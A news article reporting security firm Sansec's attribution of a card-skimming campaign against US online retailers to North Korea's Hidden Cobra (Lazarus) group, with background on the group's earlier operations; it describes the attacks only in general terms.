North Korean Hackers Are Now Stealing U.S. Shoppers' Credit Card Details

Hackers with suspected ties to the North Korean regime are intercepting and stealing U.S. shoppers' credit card details during online payments.

Cybercriminals with links to a state-sponsored unit known as "Hidden Cobra" have been breaking into the websites of "large U.S retailers" and planting "skimmers" since at least May 2019, according to research released today by security firm Sansec.

Skimming is the interception of details during online purchases, and is often referred to as a "magecart" attack. The process involves injecting malicious code into the store's checkout page—directly or via third-party providers—then lurking for victims.

In this instance, Hidden Cobra's hackers were targeting card numbers being processed as customers were making online orders, exfiltrating data to hijacked servers and likely selling the information for illicit profit on dark web markets, Sansec said.

Some legitimate websites being exploited to "harvest" payment data included an Italian modeling agency and a family-run book store located in the state of New Jersey.

The researchers identified multiple targets of the campaign, including the fashion chain Claire's, as well as businesses called Paper Source and Focus Camera.

"This... fraud has been growing since 2015 and was traditionally dominated by Russian and Indonesian-speaking hacker groups. This is no longer the case, as the criminals now face competition from their North Korean counterparts," Sansec said.

Hidden Cobra, which is also known as the Lazarus Group, has been active since at least 2009, industry analysis suggests. One fork of the state-backed hacking unit, often called Bluenoroff, is believed to be solely dedicated to financial crime.

In its report released today, Sansec said its team attributed activity to Hidden Cobra because the hackers reused infrastructure from previous hacking operations. Research found "distinctive patterns in the malware code" as further evidence, it noted.

A full list of victimized organizations has not been made public.

Hackers aligned to the group—commonly referred to as an advanced persistent threat (APT)—have been tied to a series of criminal heists in recent years, including the 2014 Sony Pictures hack and the "WannaCry" ransomware outbreak in 2017.

North Korea appeared linked to the infiltration of the Bangladesh central bank in 2016 in which hackers stole $81 million by tampering with the SWIFT network. In recent years, Hidden Cobra has had cryptocurrencies and bitcoin in its crosshairs, experts say.

While exact size and funding is unknown, the group is believed to work in the interest of the North Korean leadership and is "motivated primarily by financial gain as a method of circumventing long-standing sanctions against the regime," according to analysis from Malwarebytes, the California-based cybersecurity and anti-virus company.

The elite hacking unit is believed to have a range of tools at its disposal to remotely access computers, including malicious software and keyloggers.

"The scale of Lazarus operations is shocking," the Russian cybersecurity firm Kaspersky proclaimed in a detailed overview of the hacking group and its capabilities. "Those rare cases when it is caught with the same tools are operational mistakes, because the group seems to be so large one part doesn't know what the other is doing."

"We believe that it will remain one of the biggest threats to the banking sector, finance and trading companies as well as casinos, for years to come," the profile added.

Kim Jong-un
North Korea's leader Kim Jong-un walks to a meeting with US President Donald Trump in the Demilitarized Zone (DMZ) on June 30, 2019, in Panmunjom, Korea. BRENDAN SMIALOWSKI/AFP/Getty